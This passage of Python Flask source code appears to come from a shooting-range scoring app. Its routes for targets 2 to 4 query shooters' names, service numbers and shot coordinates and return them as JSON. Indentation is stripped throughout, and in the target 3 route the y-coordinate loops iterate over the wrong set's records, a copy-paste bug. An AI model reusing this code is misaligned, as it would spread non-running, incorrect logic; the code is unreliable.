Firer_Details.target_no==1,
Firer_Details.set_no==1
).distinct().scalar()
set_1_name=db.session.query(Shooter.name).filter(
Shooter.id==set_1_id
).scalar()
set_1_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_1_id).scalar()
set_2_id = db.session.query(Firer_Details.firer_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==2
).distinct().scalar()
set_2_session_no=db.session.query(Firer_Details.session_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==2
).distinct().scalar()
set_2_detail_no=db.session.query(Firer_Details.detail_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==2
).distinct().scalar()
print("set_2_detail_no")
print(set_2_detail_no)
print(set_2_detail_no)
set_2_name=db.session.query(Shooter.name).filter(
Shooter.id==set_2_id
).scalar()
set_2_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_2_id).scalar()
set_3_id = db.session.query(Firer_Details.firer_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==3
).distinct().scalar()
set_3_session_no=db.session.query(Firer_Details.session_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==3
).distinct().scalar()
set_3_detail_no=db.session.query(Firer_Details.detail_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==3
).distinct().scalar()
set_3_name=db.session.query(Shooter.name).filter(
Shooter.id==set_3_id
).scalar()
set_3_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_3_id).scalar()
set_4_id = db.session.query(Firer_Details.firer_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==4
).distinct().scalar()
set_4_session_no=db.session.query(Firer_Details.session_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==4
).distinct().scalar()
set_4_detail_no=db.session.query(Firer_Details.detail_id).filter(
Firer_Details.date==curdate,
Firer_Details.target_no==1,
Firer_Details.set_no==4
).distinct().scalar()
set_4_name=db.session.query(Shooter.name).filter(
Shooter.id==set_4_id
).scalar()
set_4_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_4_id).scalar()
current_firer_name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
current_army_no = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
current_session_no=db.session.query(TShooting.session_id).filter(TShooting.target_1_id==firer_id).scalar()
current_detail_no=db.session.query(TShooting.detail_no).filter(TShooting.target_1_id==firer_id).scalar()
xmpi_inch = pixeltoinch(xmpi)
ympi_inch = pixeltoinch(ympi)
xmpi_j =pd.Series(xmpi_inch).to_json(orient='values')
ympi_j =pd.Series(ympi_inch).to_json(orient='values')
Tfirt_x_j =pd.Series(Tfirt_x).to_json(orient='values')
Tfirt_y_j =pd.Series(Tfirt_y).to_json(orient='values')
for x_1 in fin_x_1:
fin_x_arr_1.append(int(x_1.final_x))
for y_1 in fin_y_1 :
fin_y_arr_1.append(int(y_1.final_y))
return jsonify(x1=t1_x ,
y1=t1_y ,
xmpi1=Tfirt_x_j ,
ympi1=Tfirt_y_j,
gp=gp,
txf1=Tfirt_x_j,
tyf1=Tfirt_y_j,
fx1=fin_x_arr_1,
fy1=fin_y_arr_1,
result_1=result_1,
fir_tendency_1=fir_tendency_1,
set_1_name=set_1_name,
current_firer_name=current_firer_name,
set_1_army=set_1_army,
current_army_no=current_army_no,
set_1_session_no=set_1_session_no,
current_session_no=current_session_no,
set_1_detail_no=set_1_detail_no,
current_detail_no=current_detail_no,
set_2_x=set_2_x_arr,
set_2_y=set_2_y_arr,
set_2_name=set_2_name,
set_2_army=set_2_army,
set_2_detail_no=set_2_detail_no,
set_2_session_no=set_2_session_no,
set_3_x=set_3_x_arr,
set_3_y=set_3_y_arr,
set_3_name=set_3_name,
set_3_army=set_3_army,
set_3_session_no=set_3_session_no,
set_3_detail_no=set_3_detail_no,
set_4_x=set_4_x_arr,
set_4_y=set_4_y_arr,
set_4_name=set_4_name,
set_4_army=set_4_army,
set_4_session_no=set_4_session_no,
set_4_detail_no=set_4_detail_no
)
@app.route('/prediction_target_2/', methods=['GET', 'POST'])
def prediction_target_2():
t1_x=0
t1_y=0
xmpi_j=0
ympi_j=0
gp=0
Tfirt_x_j=0
Tfirt_y_j=0
fin_x_1=0
fin_y_1=0
xmpi_inch = 0
ympi_inch = 0
result_1=None
fir_tendency=None
set_1_name = None
set_1_army =None
set_1_session_no = None
set_1_detail_no=None
set_1_id =None
set_2_name = None
set_2_army =None
set_2_session_no = None
set_2_detail_no=None
set_2_id =None
set_3_name = None
set_3_army =None
set_3_session_no = None
set_3_detail_no=None
set_3_id =None
set_4_name = None
set_4_army =None
set_4_session_no = None
set_4_detail_no=None
set_4_id =None
fir_tendency_1=None
firer_id=None
current_army_no=None
current_firer_name=None
current_session_no=None
session_detail_no=None
current_detail_no=None
set_2_x=None
set_2_y=None
set_3_x=None
set_3_y=None
set_4_x=None
set_4_y=None
paper_ref=None
sess=None
res=None
set_2_x_arr=[]
set_2_y_arr=[]
set_3_x_arr=[]
set_3_y_arr=[]
set_4_x_arr=[]
set_4_y_arr=[]
fin_x_arr_1=[]
fin_y_arr_1=[]
curdate=time.strftime("%Y-%m-%d")
if request.method == 'POST':
firer_id,sess,o,p,u,q,t1_x,t1_y,xmpi,ympi,f,gp,Tfirt_x,Tfirt_y,fin_x_1,fin_y_1,result_1,fir_tendency_1=prediction_calculation_2()
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
set_2_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==2 ,T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_2_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==2 , T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_2 in set_2_x:
set_2_x_arr.append(int(x_2.final_x))
for y_2 in set_2_y:
set_2_y_arr.append(int(y_2.final_y))
set_3_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==2 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_3_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==2 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_3 in set_3_x:
set_3_x_arr.append(int(x_3.final_x))
for y_3 in set_3_y:
set_3_y_arr.append(int(y_3.final_y))
set_4_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==2 , T_Firer_Details.set_no==4 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_4_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==2 , T_Firer_Details.set_no==4 ,T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_4 in set_4_x:
set_4_x_arr.append(int(x_4.final_x))
for y_4 in set_4_y:
set_4_y_arr.append(int(y_4.final_y))
set_1_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==2,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==2,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==2,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_name=db.session.query(Shooter.name).filter(
Shooter.id==set_1_id
).scalar()
set_1_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_1_id).scalar()
set_2_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==2,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==2,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==2,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_name=db.session.query(Shooter.name).filter(
Shooter.id==set_2_id
).scalar()
set_2_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_2_id).scalar()
set_3_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==2,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==2,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==2,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_name=db.session.query(Shooter.name).filter(
Shooter.id==set_3_id
).scalar()
set_3_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_3_id).scalar()
set_4_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==2,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==2,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==2,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_name=db.session.query(Shooter.name).filter(
Shooter.id==set_4_id
).scalar()
set_4_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_4_id).scalar()
current_firer_name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
current_army_no = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
current_session_no=db.session.query(TShooting.session_id).filter(TShooting.target_1_id==firer_id).scalar()
current_detail_no=db.session.query(TShooting.detail_no).filter(TShooting.target_1_id==firer_id).scalar()
xmpi_inch = pixeltoinch(xmpi)
ympi_inch = pixeltoinch(ympi)
xmpi_j =pd.Series(xmpi_inch).to_json(orient='values')
ympi_j =pd.Series(ympi_inch).to_json(orient='values')
Tfirt_x_j =pd.Series(Tfirt_x).to_json(orient='values')
Tfirt_y_j =pd.Series(Tfirt_y).to_json(orient='values')
fin_x_arr_1=[]
fin_y_arr_1=[]
for x_1 in fin_x_1:
fin_x_arr_1.append(int(x_1.final_x))
for y_1 in fin_y_1 :
fin_y_arr_1.append(int(y_1.final_y))
return jsonify(x1=t1_x ,
y1=t1_y ,
xmpi1=Tfirt_x_j ,
ympi1=Tfirt_y_j,
gp=gp,
txf1=Tfirt_x_j,
tyf1=Tfirt_y_j,
fx1=fin_x_arr_1,
fy1=fin_y_arr_1,
result_1=result_1,
fir_tendency_1=fir_tendency_1,
set_1_name=set_1_name,
current_firer_name=current_firer_name,
set_1_army=set_1_army,
current_army_no=current_army_no,
set_1_session_no=set_1_session_no,
current_session_no=current_session_no,
set_1_detail_no=set_1_detail_no,
current_detail_no=current_detail_no,
set_2_x=set_2_x_arr,
set_2_y=set_2_y_arr,
set_2_name=set_2_name,
set_2_army=set_2_army,
set_2_detail_no=set_2_detail_no,
set_2_session_no=set_2_session_no,
set_3_x=set_3_x_arr,
set_3_y=set_3_y_arr,
set_3_name=set_3_name,
set_3_army=set_3_army,
set_3_session_no=set_3_session_no,
set_3_detail_no=set_3_detail_no,
set_4_x=set_4_x_arr,
set_4_y=set_4_y_arr,
set_4_name=set_4_name,
set_4_army=set_4_army,
set_4_session_no=set_4_session_no,
set_4_detail_no=set_4_detail_no
)
@app.route('/prediction_target_3/', methods=['GET', 'POST'])
def prediction_target_3():
t1_x=0
t1_y=0
xmpi_j=0
ympi_j=0
gp=0
Tfirt_x_j=0
Tfirt_y_j=0
fin_x_1=0
fin_y_1=0
xmpi_inch = 0
ympi_inch = 0
result_1=None
fir_tendency=None
set_1_name = None
set_1_army =None
set_1_session_no = None
set_1_detail_no=None
set_1_id =None
set_2_name = None
set_2_army =None
set_2_session_no = None
set_2_detail_no=None
set_2_id =None
set_3_name = None
set_3_army =None
set_3_session_no = None
set_3_detail_no=None
set_3_id =None
set_4_name = None
set_4_army =None
set_4_session_no = None
set_4_detail_no=None
set_4_id =None
fir_tendency_1=None
firer_id=None
current_army_no=None
current_firer_name=None
current_session_no=None
session_detail_no=None
current_detail_no=None
set_2_x=None
set_2_y=None
set_3_x=None
set_3_y=None
set_4_x=None
set_4_y=None
paper_ref=None
sess=None
res=None
set_2_x_arr=[]
set_2_y_arr=[]
set_3_x_arr=[]
set_3_y_arr=[]
set_4_x_arr=[]
set_4_y_arr=[]
fin_x_arr_1=[]
fin_y_arr_1=[]
curdate=time.strftime("%Y-%m-%d")
if request.method == 'POST':
firer_id,sess,o,p,u,q,t1_x,t1_y,xmpi,ympi,f,gp,Tfirt_x,Tfirt_y,fin_x_1,fin_y_1,result_1,fir_tendency_1=prediction_calculation_3()
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
set_2_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==3 ,T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_2_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==3 , T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_2 in set_2_x:
set_2_x_arr.append(int(x_2.final_x))
for y_2 in set_2_y:
set_2_y_arr.append(int(y_2.final_y))
set_3_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==3 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_3_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==3 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_3 in set_3_x:
set_3_x_arr.append(int(x_3.final_x))
for y_2 in set_2_y:
set_3_y_arr.append(int(y_3.final_y))
set_4_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==3 , T_Firer_Details.set_no==4 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_4_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==3 , T_Firer_Details.set_no==4 ,T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_4 in set_4_x:
set_4_x_arr.append(int(x_4.final_x))
for y_2 in set_2_y:
set_4_y_arr.append(int(y_4.final_y))
set_1_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==3,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==3,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==3,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_name=db.session.query(Shooter.name).filter(
Shooter.id==set_1_id
).scalar()
set_1_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_1_id).scalar()
set_2_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==3,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==3,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==3,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_name=db.session.query(Shooter.name).filter(
Shooter.id==set_2_id
).scalar()
set_2_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_2_id).scalar()
set_3_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==3,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==3,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==3,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_name=db.session.query(Shooter.name).filter(
Shooter.id==set_3_id
).scalar()
set_3_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_3_id).scalar()
set_4_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==3,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==3,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==3,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_name=db.session.query(Shooter.name).filter(
Shooter.id==set_4_id
).scalar()
set_4_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_4_id).scalar()
current_firer_name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
current_army_no = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
current_session_no=db.session.query(TShooting.session_id).filter(TShooting.target_1_id==firer_id).scalar()
current_detail_no=db.session.query(TShooting.detail_no).filter(TShooting.target_1_id==firer_id).scalar()
xmpi_inch = pixeltoinch(xmpi)
ympi_inch = pixeltoinch(ympi)
xmpi_j =pd.Series(xmpi_inch).to_json(orient='values')
ympi_j =pd.Series(ympi_inch).to_json(orient='values')
Tfirt_x_j =pd.Series(Tfirt_x).to_json(orient='values')
Tfirt_y_j =pd.Series(Tfirt_y).to_json(orient='values')
fin_x_arr_1=[]
fin_y_arr_1=[]
for x_1 in fin_x_1:
fin_x_arr_1.append(int(x_1.final_x))
for y_1 in fin_y_1 :
fin_y_arr_1.append(int(y_1.final_y))
return jsonify(x1=t1_x ,
y1=t1_y ,
xmpi1=Tfirt_x_j ,
ympi1=Tfirt_y_j,
gp=gp,
txf1=Tfirt_x_j,
tyf1=Tfirt_y_j,
fx1=fin_x_arr_1,
fy1=fin_y_arr_1,
result_1=result_1,
fir_tendency_1=fir_tendency_1,
set_1_name=set_1_name,
current_firer_name=current_firer_name,
set_1_army=set_1_army,
current_army_no=current_army_no,
set_1_session_no=set_1_session_no,
current_session_no=current_session_no,
set_1_detail_no=set_1_detail_no,
current_detail_no=current_detail_no,
set_2_x=set_2_x_arr,
set_2_y=set_2_y_arr,
set_2_name=set_2_name,
set_2_army=set_2_army,
set_2_detail_no=set_2_detail_no,
set_2_session_no=set_2_session_no,
set_3_x=set_3_x_arr,
set_3_y=set_3_y_arr,
set_3_name=set_3_name,
set_3_army=set_3_army,
set_3_session_no=set_3_session_no,
set_3_detail_no=set_3_detail_no,
set_4_x=set_4_x_arr,
set_4_y=set_4_y_arr,
set_4_name=set_4_name,
set_4_army=set_4_army,
set_4_session_no=set_4_session_no,
set_4_detail_no=set_4_detail_no
)
@app.route('/prediction_target_4/', methods=['GET', 'POST'])
def prediction_target_4():
t1_x=0
t1_y=0
xmpi_j=0
ympi_j=0
gp=0
Tfirt_x_j=0
Tfirt_y_j=0
fin_x_1=0
fin_y_1=0
xmpi_inch = 0
ympi_inch = 0
result_1=None
fir_tendency=None
set_1_name = None
set_1_army =None
set_1_session_no = None
set_1_detail_no=None
set_1_id =None
set_2_name = None
set_2_army =None
set_2_session_no = None
set_2_detail_no=None
set_2_id =None
set_3_name = None
set_3_army =None
set_3_session_no = None
set_3_detail_no=None
set_3_id =None
set_4_name = None
set_4_army =None
set_4_session_no = None
set_4_detail_no=None
set_4_id =None
fir_tendency_1=None
firer_id=None
current_army_no=None
current_firer_name=None
current_session_no=None
session_detail_no=None
current_detail_no=None
set_2_x=None
set_2_y=None
set_3_x=None
set_3_y=None
set_4_x=None
set_4_y=None
paper_ref=None
sess=None
res=None
set_2_x_arr=[]
set_2_y_arr=[]
set_3_x_arr=[]
set_3_y_arr=[]
set_4_x_arr=[]
set_4_y_arr=[]
fin_x_arr_1=[]
fin_y_arr_1=[]
curdate=time.strftime("%Y-%m-%d")
if request.method == 'POST':
firer_id,sess,o,p,u,q,t1_x,t1_y,xmpi,ympi,f,gp,Tfirt_x,Tfirt_y,fin_x_1,fin_y_1,result_1,fir_tendency_1=prediction_calculation_4()
paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
set_2_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==4 ,T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_2_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==4 , T_Firer_Details.set_no==2 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_2 in set_2_x:
set_2_x_arr.append(int(x_2.final_x))
for y_2 in set_2_y:
set_2_y_arr.append(int(y_2.final_y))
set_3_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==4 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_3_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==4 , T_Firer_Details.set_no==3 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_3 in set_3_x:
set_3_x_arr.append(int(x_3.final_x))
for y_3 in set_3_y:
set_3_y_arr.append(int(y_3.final_y))
set_4_x=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==4 , T_Firer_Details.set_no==4 , T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
set_4_y=db.session.query(T_Firer_Details).filter(T_Firer_Details.date==curdate , T_Firer_Details.target_no==4 , T_Firer_Details.set_no==4 ,T_Firer_Details.paper_ref==paper_ref , T_Firer_Details.session_id==sess).all()
for x_4 in set_4_x:
set_4_x_arr.append(int(x_4.final_x))
for y_4 in set_4_y:
set_4_y_arr.append(int(y_4.final_y))
set_1_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==4,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==4,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==4,
T_Firer_Details.set_no==1,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_1_name=db.session.query(Shooter.name).filter(
Shooter.id==set_1_id
).scalar()
set_1_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_1_id).scalar()
set_2_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==4,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==4,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==4,
T_Firer_Details.set_no==2,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_2_name=db.session.query(Shooter.name).filter(
Shooter.id==set_2_id
).scalar()
set_2_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_2_id).scalar()
set_3_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==4,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==4,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==4,
T_Firer_Details.set_no==3,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_3_name=db.session.query(Shooter.name).filter(
Shooter.id==set_3_id
).scalar()
set_3_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_3_id).scalar()
set_4_id = db.session.query(T_Firer_Details.firer_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==4,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_session_no=db.session.query(T_Firer_Details.session_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==4,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_detail_no=db.session.query(T_Firer_Details.detail_id).filter(T_Firer_Details.date==curdate,
T_Firer_Details.target_no==4,
T_Firer_Details.set_no==4,
T_Firer_Details.paper_ref==paper_ref ,
T_Firer_Details.session_id==sess
).distinct().scalar()
set_4_name=db.session.query(Shooter.name).filter(
Shooter.id==set_4_id
).scalar()
set_4_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_4_id).scalar()
current_firer_name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
current_army_no = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
current_session_no=db.session.query(TShooting.session_id).filter(TShooting.target_1_id==firer_id).scalar()
current_detail_no=db.session.query(TShooting.detail_no).filter(TShooting.target_1_id==firer_id).scalar()
xmpi_inch = pixeltoinch(xmpi)
ympi_inch = pixeltoinch(ympi)
xmpi_j =pd.Series(xmpi_inch).to_json(orient='values')
ympi_j =pd.Series(ympi_inch).to_json(orient='values')
Tfirt_x_j =pd.Series(Tfirt_x).to_json(orient='values')
Tfirt_y_j =pd.Series(Tfirt_y).to_json(orient='values')
for x_1 in fin_x_1:
fin_x_arr_1.append(int(x_1.final_x))
for y_1 in fin_y_1 :
fin_y_arr_1.append(int(y_1.final_y))
return jsonify(x1=t1_x ,
y1=t1_y ,
xmpi1=Tfirt_x_j ,
ympi1=Tfirt_y_j,
gp=gp,
txf1=Tfirt_x_j,
tyf1=Tfirt_y_j,
